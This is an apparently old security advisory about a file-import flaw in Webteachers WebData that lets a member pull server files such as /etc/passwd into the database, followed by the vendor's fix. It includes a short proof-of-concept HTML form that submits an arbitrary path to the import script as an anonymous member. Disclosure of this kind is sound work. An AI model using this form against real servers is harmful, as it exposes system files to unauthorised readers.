COMMAND

    WebData

SYSTEMS AFFECTED

    Webteachers WebData

PROBLEM

    Following  is  based  on  a  Delphis  Consulting Security Advisory
    DST2K0039.   Delphis  Consulting  Internet  Security  Team (DCIST)
    discovered  the  following  vulnerability  in  WebData under Linux
    (although  not  tested  under  WindowsNT  we would expect the same
    results).

    It is possible to import any file (i.e. /etc/passwd) from the file
    system which the Webserver user (i.e. nobody) has access to in  to
    the WebData  database.   This enables  potenial attackers  to gain
    access to the contents of a number of key files (i.e.  hosts.allow
    / hosts.deny .etc) by browsing the database afterwards.  Note: You
    need at least a member account to perform this action.

    The below script won't just  work but will require a  little brain
    power to get working with your  database.  This enables a user  to
    import anonymously any file that the web user has access to.

    Example script:

        <form action="http://127.0.0.1/cgi-bin/webdata_test.pl" method="post">
        <INPUT TYPE=TEXT SIZE=60 NAME="pathname"><BR>
        <font size=3>Is the file comma or tab delimited?</font></B>
        <select name="delimiter" size=1>
        <option value="comma">comma
        <option value="tab">tab
        <option value="pipe">pipe
        </select>
        <INPUT TYPE=HIDDEN NAME="member" VALUE="anonymous">
        <input type=hidden name="cgifunction" value="import2">
        <BR>
        <INPUT TYPE=SUBMIT VALUE="Import">
        </form>

SOLUTION

    A new version of Webdata has been released.  The security  problem
    is addressed in the new version in the following manner.

    Only  the  admin  can  use  the  "filename"  method  of importing.
    Members must use the file upload  method.  The "enter the path  to
    the file" box does not appear on the import screen when the userid
    is not  "admin".   The program  also checks  the userid during the
    actual  importing,  so  a  hacker   could  not  simply  type   the
    querystring for a file import into the location box.